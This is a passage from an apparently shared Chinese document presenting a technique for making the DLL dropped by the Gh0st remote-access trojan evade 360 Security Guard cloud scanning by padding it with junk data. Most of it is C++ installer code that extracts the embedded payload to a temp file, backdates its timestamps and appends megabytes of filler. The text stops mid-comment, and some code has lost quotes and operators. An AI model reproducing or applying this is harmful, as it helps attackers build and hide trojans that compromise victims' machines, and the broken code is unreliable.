附加垃圾数据.docVIP

给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀- 360安全卫士, dll, 垃圾, 数据, 释放 给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀 在一个论坛看到一种过云查杀的思路，也就是靠增大自身文件大小从而让云查杀软件无法上传分析你的服务端，下面是这个方法在Gh0st这个远控上面的应用： 一：install工程 BOOL ReleaseResource(HMODULE hModule, WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName, LPCTSTR lpConfigString) { HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes; char strTmpPath[MAX_PATH]; char strBinPath[MAX_PATH]; // 一定要跟别的区分开，GetTickCount有可能得到一样的值 GetTempPath(sizeof(strTmpPath), strTmpPath); wsprintf(strBinPath, %s\\%d_res.tmp, strTmpPath, GetTickCount()); hResInfo = FindResource(hModule, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo == NULL) return FALSE; hRes = LoadResource(hModule, hResInfo); if (hRes == NULL) return FALSE; hFile = CreateFile ( strBinPath, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile == NULL) return FALSE; SYSTEMTIME st; memset(st, 0, sizeof(st)); st.wYear = 2004; st.wMonth = 8; st.wDay = 17; st.wHour = 20; st.wMinute = 0; FILETIME ft,LocalFileTime; SystemTimeToFileTime(st, ft); LocalFileTimeToFileTime(ft,LocalFileTime); SetFileTime(hFile, LocalFileTime, (LPFILETIME) NULL, LocalFileTime); WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), dwBytes, NULL); // 写入配置 if (lpConfigString != NULL) { WriteFile(hFile, lpConfigString, lstrlen(lpConfigString) + 1, dwBytes, NULL); //给dll末尾添加垃圾附加数据以增大文件体积 int i = 0; char *szStrAdd; szStrAdd=new char[1024*1024]; memset(szStrAdd,.,1024*1024); //这里循环10次，释放的dll大概就是10M了，如果想把dll再